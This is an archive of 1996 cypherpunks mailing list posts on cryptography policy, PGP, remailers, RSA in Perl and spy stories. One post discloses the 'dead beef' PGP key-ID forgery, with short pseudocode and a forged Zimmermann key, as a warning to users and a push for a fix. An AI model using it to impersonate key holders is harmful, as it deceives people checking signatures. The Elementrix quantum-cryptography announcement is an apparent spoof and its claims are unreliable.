Message-ID: <9603281728.AA30292@as200.zi-mannheim.de>
MIME-Version: 1.0
Content-Type: text/plain


Here is an abstract of a report the German newsmagazine Focus
published on March 11, 1996 (p. 16) - "Spaete Ermittlungen gegen
Techno-Spione" (late/belated investigations against technology
spies). I do not include a translation of the whole original text
for copyright reasons.

"Specialists of the German Federal Police Agency (BKA) have decrypted
44 floppy disks from the former [East German] Ministry for State
Security" (MfS). A defector had handed over the floppies to the
German Federal Intelligence Agency (BND) in spring 1990. The disks
contain information on East German spies in former West Germany.
Judicial inquiries against 29 suspects have started now. Apparently,
the BKA got the data no sooner than 1994. This is because the BND did
not tell law authorities about the floppy disks. German federal DAs
learned about the data in late summer 1994 by chance. The article
does not say whether the defector came over with the keys. - Probably 
not, otherwise prosecution should have started much earlier. 

It is likely that the extremely paranoic MfS used a cipher and a key
length it believed to be sufficiently strong. According to Bruce
Schneier's Applied Cryptography East Germany was quite aware of DES,
it even produced DES chips. Another possibly strong algorithm used in
the former Soviet block is GOST (a block cipher derived from the
concepts of DES, also described by Schneier). Let us assume BKA
specialists have broken the code using a combination of
cryptoanalysis, brute force and good luck. They are policemen, not
espionage professionals. Further, the BKA is much smaller than the
FBI. Imagine what code breaking capabilities a well-funded, big
intelligence agency should have then! 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chein-hsinLiu <r3506010@cml11.csie.ntu.edu.tw>
Date: Thu, 28 Mar 96 05:19:10 PST
To: cypherpunks@toad.com
Subject: Question about Blind Signature
Message-ID: <199603281310.VAA23754@cml11.csie.ntu.edu.tw>
MIME-Version: 1.0
Content-Type: text/plain


Hi!
I have some stupid question about how to implement blind signature.
I Know it works as follows:
If A wants B to sign X but donot know it is X, A can send
   X*PK(random)  : PK is public key of B
Then B signs on message:
  SK(X*PK(random)) ==> SK(X)*random
Then A can obtain SK(X) by SK(X)*random/random

My question is when I see how RSA encrypts using PKCS
The PKCS block is like this
 00 01 FF FF FF FF ... 00 input
Then SK(00 01 FF FF FF .. 00 input) .
If the input = X*PK(random)
then SK(00 01 FF FF FF .. 00 X*PK(random)) will not produce SK(X)*random
How to solve this??
Thanks!!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Mon, 1 Apr 1996 14:48:35 +0800
To: cypherpunks@toad.com
Subject: [ITAR/POLITICS] rsa-in-3-lines-of-perl just shrunk!!
Message-ID: <199603312332.AAA00930@adam.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Sorry to contribute to the simply awesome noise to signal ratio here
lately (hopefully the subject tag should help those not interested in
politics), but...

[if you don't know what I'm talking about, see

	http://www.dcs.ex.ac.uk/~aba/rsa/ 

for a combined perl hack and ITAR violation]

Due mainly to a couple of insights donated by someone who was
introduced to the code via a friends `munition' T-shirt... he started
the ball rolling again...

it shrunk from:

#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length($n)&~1)/2)

to:

#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)

(Actually it's not quite as impressive as it might look at first
glance because the old version included the comment "-export-a-
crypto-system-sig -RSA-3-lines-PERL", so the new one should really be
compared against:

#!/bin/perl -s
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length($n)&~1)/2)

)

but it's still a whole 31 bytes shorter, and it now really is in 3
lines of perl rather than cheating and not counting the #!/bin/perl
line.  (Several people took me to task on that one).

I won't consume list bandwidth describing exactly how the new one
works, and the arcane perl and dc hackery that went into it, as I have
described it all in excruciating detail on:

	http://www.dcs.ex.ac.uk/~aba/rsa/story.html

I really wasn't expecting to see it shortened any further.

There goes all those T-shirts, outdated, my sincere apologies to
Richard White also, whose tattoo was featured in the April issue of
Wired (at least the UK edition, the US one too?),

Oh yeah, and if you can see any ways to shorten it, please tell me!
(Perl5 specifics not allowed, there is already a shorter p5 specific
version but it's got to be as portable as possible).

Adam

ps I now have a reasonable stock of T-shirts again after the prolonged
hiatus of my printer, who finally delivered the 2nd batch.
--
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cpunk@remail.ecafe.org (ECafe Anonymous Remailer)
Date: Mon, 1 Apr 1996 14:20:20 +0800
To: cypherpunks@toad.com
Subject: Spy Dupe
Message-ID: <199604010019.BAA07060@pangaea.hypereality.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


Has this dupe russe tale appeared in the US? Or brags
of cutting edge XX-equipment duping global buyers?

-----

The Sunday Times (UK) 31 March 1996

Spy in the copier gave CIA its coup

by James Adams Washington

A tiny camera hidden in a photocopier in the Soviet
embassy in Washington provided America with one of the
greatest intelligence coups of the cold war, it emerged
last week.

The camera, planted by the CIA in the early 1960s,
provided a treasure trove of intelligence, with access to
virtually every document copied by the Russians for most
of the decade.

The CIA was exploiting a Russian bureaucratic obsession
with documents: in 1963, word got out that embassy staff
were fed up with copying documents by hand and had
approached Xerox to rent a photocopier. American spies
went to work.

Ray Zoppoth, one of Xerox's engineering experts, hit upon
the idea of installing a camera opposite the
photocopier's mirror. It was activated automatically when
the document scanning light came on.

The coup could hardly have come at a better time for the
CIA. The Cuban missile crisis had plunged American-Soviet
relations into one of their darkest periods. The CIA,
embarrassed over the way the Soviets had been able to
move missiles into Cuba, was determined to improve its
intelligence capability.

One problem was how to retrieve the camera's film at
regular intervals. Xerox prided itself on the reliability
of its early machines but it sent a maintenance man
regularly to the embassy to collect the film.

Later Zoppoth invented an even smaller camera that could
be disguised as a tool. Over the next six years the
camera was installed in photocopiers at other embassies
of hostile and friendly countries. "Xerox copiers had
become part of every office system and no foreign embassy
was immune to possible spying," said Zoppoth.

The operation was halted only in 1969, when an American
chemical company tried to bug the photocopier of a rival
firm to steal patented designs. The publicity surrounding
the case alerted the Russians and they stopped
photocopying their secret documents.

--







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jdcooley@ix.netcom.com (John D. Cooley)
Date: Wed, 3 Apr 1996 00:51:50 +0800
Subject: Re: ViaCrypt PGP 4.0 for Windows shipping
In-Reply-To: <2.2.32.19960327060017.0090a994@mail.teleport.com>
Message-ID: <4jnd37$6no@dfw-ixnews4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Alan Olsen <alano@teleport.com> wrote:

>I have not seen this here yet, so sorry if you have seen it...

>ViaCrypt is claiming that they are now shipping the Windows version of their
>PGP 4.0.  (I tend to not believe marketing claims until I hear from people
>who actually have it.)

I have had my ViaCrypt PGP version 4.0 for windows for 1 week.

>Does anyone know if there are plans for this version to be interoperable
>with PGP 3.0?

It is *supposed* to be interoperable with all PGP versions 2.6 and later.

>Furthermore, has anyone tried the new version?

I have used it, but so far have not been able to communicate with anyone
that is using PGP 2.6.2.  I have communicated with ViaCrypt and they are
researching the problem.  Yes, I used the option that is supposed to make
the key interoperable with PGP 2.6.2.  I followed the instructions in the book
and the security note.  Even did it again (generated a new key) just to make
sure I did it correctly, still no go!  

I will not blame ViaCrypt until I know if it is my fault or not!

BTW, I'm using the Business Edition.



jdcooley@ix.netcom.com
////////////////////\\\\\\\\\\\\\\\\\\\\
Always do right.  This will
gratify some people and astonish
           the rest.
                    Mark Twain
////////////////////\\\\\\\\\\\\\\\\\\\\
PGP Public Key available upon request






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 2 Apr 1996 02:47:37 +0800
To: cypherpunks@toad.com
Subject: NYT on CFP
Message-ID: <199604011124.GAA17323@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The New York Times, April 1, 1996, p. A14.


   Pioneers of Cyberspace Move Into Wider Arena

   By Peter H. Lewis


   Cambridge, Mass., March 30 -- Cyberspace is dead, many of
   its electronic pioneers said at a conference here this
   week.

   As the Internet population has grown into the millions,
   what was once a small, self-regulating society of academics
   and computer wizards has been engulfed by mainstream
   culture. But in their efforts to preserve the libertarian
   spirit of the electronic frontier, the original members of
   the cyberspace community have emerged as a political and
   social force.

   "Last year, it was still possible for people to say
   cyberspace is a different place, subject to different laws
   and different rules and that there is a Net culture," said
   Hal Abelson, a professor of computer science and
   engineering at the Massachusetts Institute of Technology
   here. "Now you have such a large percentage of the
   population on the Net, it just is not sensible to talk
   about this as some other place anymore. What you are really
   talking about now is the communications fabric of the
   country."

   In what was seen as a clear sign of Internet users new
   power, several members of Congress announced, by telephone
   and through the Internet, new legislation and initiatives
   at the gathering here, the annual Computers, Freedom and
   Privacy Conference. The proposals include the formation of
   an Internet Caucus in Congress and a Senate blll to relax
   the Government's laws restricting the transmission of
   secrets over the global information network.

   "Washington is coming to thls conference in droves," said
   Daniel J. Weltzner, deputy dlrector of the Center for
   Democracy and Technology, one of several public-interest
   groups that seek to influence Government policy related to
   cyberspace, "and I think it's very exciting and promising.
   It's the coming of age of this community."

   The members of Congress were wooing more than 500 of the
   Internet's most prominent champions, who had gathered to
   discuss issues that were once esoteric but are now
   affecting millions of people worldwide: questions of
   privacy, electronic copyrights, computer crime, the nature
   of free speech, digital pornography, electronic cash and
   grassroots electronic democracy.

   The Computers, Freedom and Privacy crowd included its usual
   assortment of computer hackers, academics and self-
   described crypto-anarchists, and even one man wearing video
   goggles with an antenna apparently sprouting from his head.
   But it also included others who wanted to assess the fusion
   of cyberspace and real space: Federal judges, lawmakers,
   White House policy experts, corporate executives and
   law-enforcement agents.

   Senator Conrad Burns, a Republican from the real frontier
   state of Montana, chose the conference to announce, by
   telephone, new legislation that would remove nearly all
   current Government restrictions on the export of
   mass-market encryption software, which is used to send
   secret messages over computer and telephone networks.

   Senator Burns's legislation would also block the
   Administration from imposing as a Government standard any
   form of data encryption that would give law-enforcement
   agencies the ability to decode messages.

   The Senator's bill places him squarely at odds with the
   Clinton Administration and the Justice Department. But Mr.
   Burns said the use of robust data encryption would foster
   the rise of electronic commerce, distance education and
   digital communicatlons, which his large, rural state
   desperately needs in the 21st century. While the bill might
   have little chance of passage this year, conference
   participants were heartened by what appears to be growing
   support in Congress for a relaxation of the Government's
   cryptography policy.

   The proposal drew some opposition. "I think we'll regret it
   down the road," said Dorothy E. Denning, a professor of
   computer sciences at Georgetown University and a computer
   security consultant to the military. Dr. Denning and others
   have argued that the use of unrestricted encryption would
   thwart the ability of law-enforcement and intelligence
   agencies to conduct wiretaps on messages sent by foreign
   spies, terrorists, child pornographers and other criminals.

   On Friday, a bipartisan group of wired lawmakers addressed
   the conference by telephone and Internet to announce the
   formation of a Congressional Internet Caucus. Fewer than
   half of all members of Congress are now on line.

   Representative Rick White, Republican of Washington, said,
   "The idea behind the Internet Caucus is to do two things:
   increase members understanding of the Internet and get more
   members on-line so that people can contact their elected
   representatives on the Internet."

   [End]







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Tue, 2 Apr 1996 19:44:18 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199604011450.GAA20116@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail. For more information, see:
http://www.c2.org/~raph/premail.html

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@miron.vip.best.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp hash ksub ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@spook.alias.net> cpunk mix pgp hash latent cut ek reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut ek";
$remailer{"ecafe"} = "<cpunk@remail.ecafe.org> cpunk mix";
$remailer{"wmono"} = "<wmono@valhalla.phoenix.net> cpunk mix pgp. hash latent cut";
$remailer{"shinobi"} = "<remailer@shinobi.alias.net> cpunk mix hash latent cut ek reord";
$remailer{"amnesia"} = "<amnesia@chardos.connix.com> cpunk mix pgp hash latent cut ksub";
$remailer{"gondolin"} = "<mix@remail.gondolin.org> cpunk mix pgp hash latent cut ek reord";
$remailer{"tjava"} = "<remailer@tjava.com> cpunk mix pgp hash latent cut";
$remailer{"pamphlet"} = "<pamphlet@idiom.com> cpunk pgp hash latent cut ?";
$remailer{'alpha'} = '<alias@alpha.c2.org> alpha pgp';
$remailer{'gondonym'} = '<alias@nym.gondolin.org> alpha pgp';
$remailer{'nymrod'} = '<nymrod@nym.alias.net> alpha pgp';
$remailer{'cubed'} = '<alias@alias.alias.net> alpha pgp';
$remailer{"lead"} = "<mix@zifi.genetics.utah.edu> cpunk pgp hash latent cut ek";
$remailer{"treehole"} = "<remailer@mockingbird.alias.net> cpunk pgp hash latent cut ek";
$remailer{"nemesis"} = "<remailer@meaning.com> cpunk pgp hash latent cut";
$remailer{"exon"} = "<remailer@remailer.nl.com> cpunk pgp hash latent cut ek";
$remailer{"vegas"} = "<remailer@vegas.gateway.com> cpunk pgp hash latent cut";
$remailer{"haystack"} = "<haystack@holy.cow.net> cpunk pgp hash latent cut ek";
$remailer{"ncognito"} = "<ncognito@gate.net> mix cpunk latent";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(c2 robo alpha)
(gondolin gondonym)
(flame hacktic replay)
(alumni portal)
(vishnu spook wmono nymrod)

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

Note: The remailer list now includes information for the alpha
nymserver.

Last update: Mon 1 Apr 96 6:48:11 PST
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
ecafe    cpunk@remail.ecafe.org           -*#*########      :48 100.00%
haystack haystack@holy.cow.net            *-##+*****+*     2:09 100.00%
cubed    alias@alias.alias.net                 ***+#**    19:29  99.99%
pamphlet pamphlet@idiom.com               ++++++++++-+  1:22:18  99.99%
nymrod   nymrod@nym.alias.net             +++--*+*+--*    38:14  99.98%
nemesis  remailer@meaning.com             **++********    17:30  99.97%
flame    remailer@flame.alias.net         .---.------   5:25:05  99.97%
shinobi  remailer@shinobi.alias.net       #*########*#     1:07  99.97%
hacktic  remailer@utopia.hacktic.nl       ****+*******     8:11  99.97%
alpha    alias@alpha.c2.org               ++++-++++**+    46:53  99.92%
vegas    remailer@vegas.gateway.com       .-*.-#*#+###  4:28:59  99.89%
ncognito ncognito@gate.net                #*# ##***-##     6:36  99.72%
mix      mixmaster@remail.obscura.com     -+-___.--*-* 15:11:14  99.69%
spook    remailer@spook.alias.net         +***+*+**+**    19:46  99.66%
gondolin mix@remail.gondolin.org          __.--*-----  13:53:43  99.64%
gondonym alias@nym.gondolin.org           __.--*--+--  13:48:57  99.64%
exon     remailer@remailer.nl.com         --***++**-*     13:59  99.59%
replay   remailer@replay.com              ++**++*+**+      8:46  99.57%
vishnu   mixmaster@vishnu.alias.net       ++- - ***--+  2:46:31  99.26%
treehole remailer@mockingbird.alias.net   --+++-- -+++  3:47:33  98.96%
amnesia  amnesia@chardos.connix.com       -- --+--+++   1:57:42  98.49%
portal   hfinney@shell.portal.com         *#-#####*##      1:30  96.59%
alumni   hal@alumni.caltech.edu           _* #+# -###   1:08:06  96.24%
penet    anon@anon.penet.fi               .___ -__..   47:32:06  95.78%
c2       remail@c2.org                    *****.+-+++     37:24  94.43%
extropia remail@miron.vip.best.com        ---------     6:03:31  83.40%
lead     mix@zifi.genetics.utah.edu       *+++++          34:15  34.40%
tjava    remailer@tjava.com               #* **            1:02  25.24%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Rose <Greg_Rose@sydney.sterling.com>
Date: Mon, 1 Apr 1996 12:35:58 +0800
To: David Weisman <weisman@osf.org>
Subject: Re: HP & Export of DCE
In-Reply-To: <9603272147.AA19461@oberon.osf.org.osf.org>
Message-ID: <pgpmoose.199604010930.25543@paganini.sydney.sterling.com>
MIME-Version: 1.0
Content-Type: text/plain


  
  On Wed Mar 27, 1996, Perry E. Metzger wrote:

      Adam Shostack writes:

      > | Adam Shostack writes:
      > | > Well, if Leahy passes, DCE is exportable.

  DCE is exported today, although without the ability to encrypt application
  traffic.  Authentication and message integrity are in the export version.

Yes, but lest we miss the point, Anon's posting
was about FULL DCE, with the end-to-end security
option, unless I'm very much mistaken.

Greg.

Greg Rose               INTERNET: greg_rose@sydney.sterling.com  
Sterling Software       VOICE:  +61-2-9975 4777    FAX:  +61-2-9975 2921
28 Rodborough Rd.       http://www.sydney.sterling.com:8080/~ggr/
French's Forest         35 0A 79 7D 5E 21 8D 47  E3 53 75 66 AC FB D9 45
NSW 2086 Australia.     co-mod sci.crypt.research, USENIX Director.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Tue, 2 Apr 1996 12:05:44 +0800
To: cypherpunks@toad.com
Subject: Cylink gives away encryption kit
Message-ID: <199604011653.KAA18559@foo.garply.com>
MIME-Version: 1.0
Content-Type: text/plain












  Cylink to offer free SDK for
  embedding encryption security 

  By Jessica Davis 
  InfoWorld Electric 



  Posted at 1:21 PM PT, Mar 29, 1996 
  Lobbing the latest bomb in a patent war over public key/private key
  encryption technology, Cylink Corp. will offer a Software Developers Kit
  (SDK) free-of-charge so that software companies can embed security and
  encryption technologies in their products. 

  Cylink's move to offer Passport Gold for free follows a failed attempt in
  federal court to stop another company, RSA Data Security Inc., from
  selling a similar kit allegedly based on Cylink patents. 

  The two companies have been engaged in a public relations feud, as well as
  a federal court patent dispute and IS mind share war over public key/private
  key/certificate authority encryption technology. Cylink lost the latest round
  in federal court in early March. 

  Cylink and RSA both participated in the creation of public key/private key
  technologies through their partnership, Public Key Partners. PKP was
  formed in 1990 to establish security standards to license to software
  vendors. The partnership fell apart over the patent dispute. 

  Cylink's PassportGold modules and APIs allow software developers to
  enable their applications to access national certificate authority electronic
  commerce and correspondence services that are planned by the U.S. Postal
  Service's ECS system and other commercial certificate authority facilities. 

  Cylink expects its revenue stream to come from a series of products,
  existing and planned, that enhance the speed and effectiveness of such
  encryption technologies. Cylink has also announced SecureFrame, one of
  those products that provides a high-speed data encryption and security
  system for frame relay-based Wide Area Network environments. 

  Working in conjunction with any public or private frame relay network,
  Secure Frame dynamically encrypts data while authenticating its source and
  destination, delivering throughput of up to 2.048 Mbps. 

  SecureFrame is priced at $5,995 and will ship in April. 

  Cylink also introduced SecureNode, an SNMP and TCP/IP-based data
  security hardware and software card for secure end-to-end data transfer
  and communication. The PC card is available now and provides network
  independent security management at the desktop level without hitting users
  with crippled CPU performance by acting as an "encryption and
  authentication accelerator." 

  SecureNode cards for ISA or for PCI are priced at $595 and $695
  respectively. The standalone software product is priced at $199. 

  Sunnyvale, Calif.-based Cylink can be reached at (800) 533-3958 or
  http://www.cylink.com/. 

                                                                                       

                                                                                       

                                                                                       

                                                                                      

                                                                                      

                                                                                      

                                                                                      

                                                                                      

                                                                                      


Please direct your comments to InfoWorld Electric News Editor Dana Gardner.

                     Copyright (c) 1996 InfoWorld Publishing Company 

                                              





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sales@elementrix.co.il
Date: Tue, 2 Apr 1996 16:05:40 +0800
To: mail2news@myriad.alias.net
Subject: Elementrix Technology Announces Power Quantum Cryptography
Message-ID: <9604010051591.The_Win-D.jacktech@delphi.com>
MIME-Version: 1.0
Content-Type: text/plain



Elementrix Technology Announces Power Quantum Cryptography


Elementrix Technology, a leading developer of security software, including
the well-known Power One Time Pad (POTP(TM)) today announced the first
commercial release of a next-generation unbreakable security product.

Power Quantum Cryptography pushes data security into the modern world of
quantum physics.  Elementrix PQC(TM) is your best choice for securing
your sensitive data against Hackers, Crackers, Snoops, NSA, and other Evil
People.

Elementrix, long recognized as an innovator in unconventional data security
technology, combines absolute security with utility, performance and ease
of use.  Our remarkably simple algorithm gives you unprecedented speed
in a software-only implementation.  PQC requires no additional hardware,
and no knowledge of quantum physics.

By using a novel method (covered by trade secret law and now patent-pending
in 26 countries) our server software transmits packets onto your local
network without reading them, thus preserving their unique quantum
properties.  Any attempt to read the packet, except by the intended
recipient will destroy the quantum waveform of the packet.  Our
sophisticated error-recovery system will detect this and re-initialize
with a predefined Emergency Quantum State, which has all the same
characteristics as the Normal Quantum State, but has not been compromised
by the attempted eavesdropper.

PQC provides you with fast, reliable, and secure data transmissions,
XOR encrypted with unbreakable quantum randomness.  Our Plug-and-Play
installation assures that you can have secure transmissions within
minutes.  PQC ensures that your data transmissions are absolutely
unbreakable, guaranteed by the Laws of Physics.

The innovative PQC technology requires no public or private Keys, no master
or session key, no key management, no key escrow or trusted third parties,
no key distribution servers, no access codes, no substantial overhead, no
special training for users, and no waiting.  PQC gives you total security
from anyone without the aid of an object code disassembler.

Elemntrix PQC(tm) version 1.0 requires 80386 or higher IBM PC (or 100%
compatible), 4MB RAM, MS-Windows 3.1, Windows For Workgroups, or Windows 95,
a MODEM or LAN connection, and any TCP/IP stack for Windows.

For more information:

Tel: +972-4-550963  Fax: +972-4-550356
Within the US and Canada, phone: 1-212-888-8879  fax: 1-212-935-3882
e-mail: sales@elementrix.co.il
        info@elementrix.co.il
for customer and technical support:  support@elementrix.co.il





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@c2.org>
Date: Tue, 2 Apr 1996 20:07:02 +0800
To: mail2news@utopia.hacktic.nl
Subject: "Dead beef" attack against PGP's key management
Message-ID: <199604011958.LAA19153@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

   This post is signed by a forged key for Phil Zimmermann. I forged
the key this morning. The key has the same user id and visible key id
as an old key for Phil Zimmermann, which he has since revoked.

   I should stress that this attack does not in any way weaken the
security of PGP's message formats. However, it does expose a problem
in the user interface of its key management. Namely, it is fairly easy
to forge a key that looks very similar to an existing key. In fact,
the only way to distinguish between real and forged keys in general is
by the fingerprint and keysize together.

   My purpose in posting this is to demonstrate that such forgeries
are possible. The lesson is: please do not use the key id alone to
identify keys.

   Another reason for the public posting of this forgery is to goad
the PGP development team into improving the user interface in PGP 3.0,
so as to make the detection of such a forgery much easier, if not
routine. Derek Atkins has assured me that PGP 3.0 will include a
cryptographic hash of the key, for use as a key id. If implemented
properly, such a facility would address this attack.

   I am not the first to propose this attack. According to Derek
Atkins, Paul Leyland first proposed the attack two years ago. Also,
Greg Rose successfully mounted a similar attack six months ago,
creating a key with user id 0xDEADBEEF, thereby giving rise to the
name.

   The pseudocode for the attack is as follows:

      choose random 512 bit prime p
      choose random 480 odd x
      q = x * ((0xdeadbeef * (p * x) ^ -1) mod 2^32)
      do {q += 2^32} while q composite

   The above bit of pseudocode replaces the original selection of p
and q, which are normally just random 512 bit primes. Without having
done detailed analysis, I believe that the resulting forged keys are
just as good as ordinary PGP keys. Further, the modified key
generation is almost as fast as ordinary PGP key generation, and I
think I could speed it up a bit more.

   The attack took me a few hours to design and code. Any good
programmer familiar with PGP could duplicate it easily.

   One practical application of this attack is to implement a certain
degree of "stealth." Since PGP includes the key id in encrypted
messages, it is in most cases possible to identify the recipients of
encrypted messages. However, if a lot of people generated keys with
the same key id, then it would not be possible to tell from the
encrypted message which one was the intended recipient.

   Here's the public key I forged, which can be used to check the
signature of this message:

Key for user ID: Philip R. Zimmermann <prz@acm.org>
1024-bit key, Key ID FF67F70B, created 1992/07/22
Also known as: Philip R. Zimmermann <prz@sage.cgd.ucar.edu>
- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAyptNMAAAAEEALRhS3ZCFKLPNF/fZeluh/rNfpgZ5a0ddTBtxJ+1yLIkVurb
HWFFBsrmnA4hU4MhlA8DS/f2gnS0v3zyQ78JOY1SBIJrLdaIPIrh0ZTAZXWoQWDe
Qknm1ZgyLkIRJlt5aDLp+iLJ5sc+LSO5N/DtrL+Htc5MF0AVAWtzPhz/Z/cLAAUR
tCJQaGlsaXAgUi4gWmltbWVybWFubiA8cHJ6QGFjbS5vcmc+iQCVAwUQMWAremtz
Phz/Z/cLAQE//AP/bg9gMOuiBYkFCiyarJ/DIARWDf7e4bWFJloXAyPeBXCITDIw
tuHRJ41yFqnlLmdcuVhXQf/xrH248JyWpHqqED6eOU/PnBHo9IR6H0Fts+O3I+vk
tOYRjuTJy+6JV0s/8VN/Sgh8y6Jm2FGhhzhCp6KHNcTHpUud6iGScaEs/CG0LFBo
aWxpcCBSLiBaaW1tZXJtYW5uIDxwcnpAc2FnZS5jZ2QudWNhci5lZHU+
=Z1mf
- -----END PGP PUBLIC KEY BLOCK-----

Raph Levien

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMWA2pGtzPhz/Z/cLAQELEQP/fam4tHS8TlMy7SFoUZvC0C4q0ID9Ze5W
rY2D++df4UtAFDITGs4lQqzeq6YCqk51oT8gZAACK6D6UlFgr5roIbgwa74Fxso1
B5mquC9axlOlxZJI1PuK+NflBJqCokuQGtG95ER6vbm4n4RACW43In9SAatIvduN
JfBSLYrAr14=
=V5U6
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard Martin" <rmartin@aw.sgi.com>
Date: Tue, 2 Apr 1996 12:57:47 +0800
To: cypherpunks@toad.com
Subject: PICS makes headline in ET
Message-ID: <9604011222.ZM11573@glacius.alias.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----


The electronic Telegraph is an electronic version of the British daily,
the Telegraph. I actually went through the bother of filling out their
online registration a few months ago.

The `headline' of today's edition is an article on PICS, the Platform for
Internet Content Selection, boosting it as a method for screening [actually,
they use the term `policing'] content on the internet.

http://www.telegraph.co.uk/et/access?ac=130174817686&pg=home.html

Feel free to use the above url for reading the one article. I'm somewhat
undecided on whether i think it would be good idea for several folks to
